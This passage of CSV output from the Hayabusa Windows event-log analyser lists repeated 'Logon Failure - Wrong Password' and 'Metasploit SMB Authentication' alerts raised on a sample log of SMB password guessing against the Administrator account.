Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg9rUUIwEfujwCvq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zfvpeyTKc3YYkVkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJGR6CYKLUJp2fWl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cmSap0AJZq0KMRBV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnVCbq1IYZF19oYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVaDMa2uNXTZNcBj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymf6Fhv5ieWwcq73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CT6YMlX1GqeEuAHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FDJ1IFpMNQ2Euhyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EGTzqnHJIiZdSgNk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: epSckAKbAp8qag89 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NNC8ilAuznKPwFvV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 